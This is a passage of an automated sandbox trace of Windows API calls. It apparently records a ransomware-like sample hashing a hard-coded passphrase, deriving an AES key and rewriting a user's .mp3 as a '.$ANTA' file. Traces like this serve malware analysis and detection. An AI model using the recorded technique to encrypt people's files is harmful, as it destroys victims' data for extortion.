hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0117.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.556] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.557] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.557] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.557] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0117.557] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.557] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca790, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0117.558] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.558] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca868, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0117.558] CryptHashData (hHash=0x41ac640, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0117.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.597] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca808, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0117.598] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0117.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0117.598] CryptDestroyHash (hHash=0x41ac640) returned 1 [0117.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\cax1anhbap9sa34tftcq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0117.598] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.598] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0117.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0117.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a41d8 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0117.600] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b")) returned 0x10 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0117.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0117.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\cax1anhbap9sa34tftcq.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0117.602] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0117.602] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0117.606] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0117.606] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0117.608] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x7844, lpOverlapped=0x0) returned 1 [0117.609] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0117.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17844) returned 0x4516010 [0117.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0117.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17844) returned 0x452d860 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.612] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17844) returned 0x4516010 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.612] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0117.613] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0117.613] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0117.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0117.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0117.613] 